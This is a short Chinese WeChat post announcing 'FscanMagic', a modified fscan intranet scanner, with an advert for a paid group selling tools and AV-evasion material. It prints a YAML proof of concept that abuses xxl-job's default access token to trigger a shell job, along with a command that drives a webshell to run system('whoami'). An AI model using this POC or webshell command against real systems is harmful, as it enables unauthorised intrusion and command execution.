申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
添加常见密码
添加常见端口
输出信息添加不同颜色
增加常见的POC
新增加了一些常见的POC(内网中经常遇到),如:海康威视、大华、华三、华为、xxl_job、宏景......
poc模版与xray的相似
name: poc-yaml-xxl_job_accessToken
rules:
- method: POST
path: "/run"
headers:
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
body: |-
{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}
expression: |
response.status == 200 && response.body.bcontains(bytes('{"code":200}'))
webshell管理
./fscan -WHost "url" -Wcommand "system('whoami');" -WebShellPasswd "密码"
添加了两个参数
-WHost:webshell的url,如:http://127.0.0.1/webshell.php
-WebShellPasswd:webshell的密码,如:123456
脚本已放置星球
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
原文始发于微信公众号(鹏组安全):FscanMagic
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论